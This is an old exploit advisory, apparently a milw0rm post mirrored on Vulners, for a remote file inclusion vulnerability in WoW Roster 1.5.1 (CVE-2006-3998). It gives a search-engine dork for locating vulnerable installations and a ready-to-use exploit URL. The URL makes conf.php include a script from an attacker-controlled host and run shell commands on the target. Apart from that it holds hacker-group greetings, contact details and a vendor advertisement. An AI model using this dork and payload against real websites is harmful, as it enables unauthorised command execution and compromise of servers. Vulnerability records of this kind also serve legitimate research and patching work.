World of Warcraft (WoW) Roster 1.5.1 Remote File Inclusion vulnerabilit
Reporter | Title | Published | Views | Family All 3 |
---|---|---|---|---|
NVD | CVE-2006-3998 | 5 Aug 200601:04 | โ | nvd |
CVE | CVE-2006-3998 | 5 Aug 200601:04 | โ | cve |
Cvelist | CVE-2006-3998 | 5 Aug 200601:00 | โ | cvelist |
--------------------------------------------------------------------------------
Title : WoW Roster <= 1.5.1 Remote File Include Vulnerabilities
###############################################################################
Discovered By Skulmatic
-----------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : World of Warcraft (WoW) Roster
URL : http://www.wowroster.net/
-----------------------------------------------------------------------------
dork : "wow roster version 1.5.*"
Exploit :
http://[target]/[wow_roster_path]/conf.php?subdir=http://[attacker]/cmd.txt?&cmd=ls
------------------------------------------------------------------------------
greatz:
~~~~
# special to song hye kyo (for inspiration)
# To all members of #papmahackerlink and #hackid, OLiBekaS, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster.
-------------------------------------------------------------------------------
Contact:
~~~~~~
Nick: skulmatic
E-mail: skulmatic[at]gmail[dot]Com
--------------------------------- [ eof ] ---------------------------------------
# milw0rm.com [2006-08-01]
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo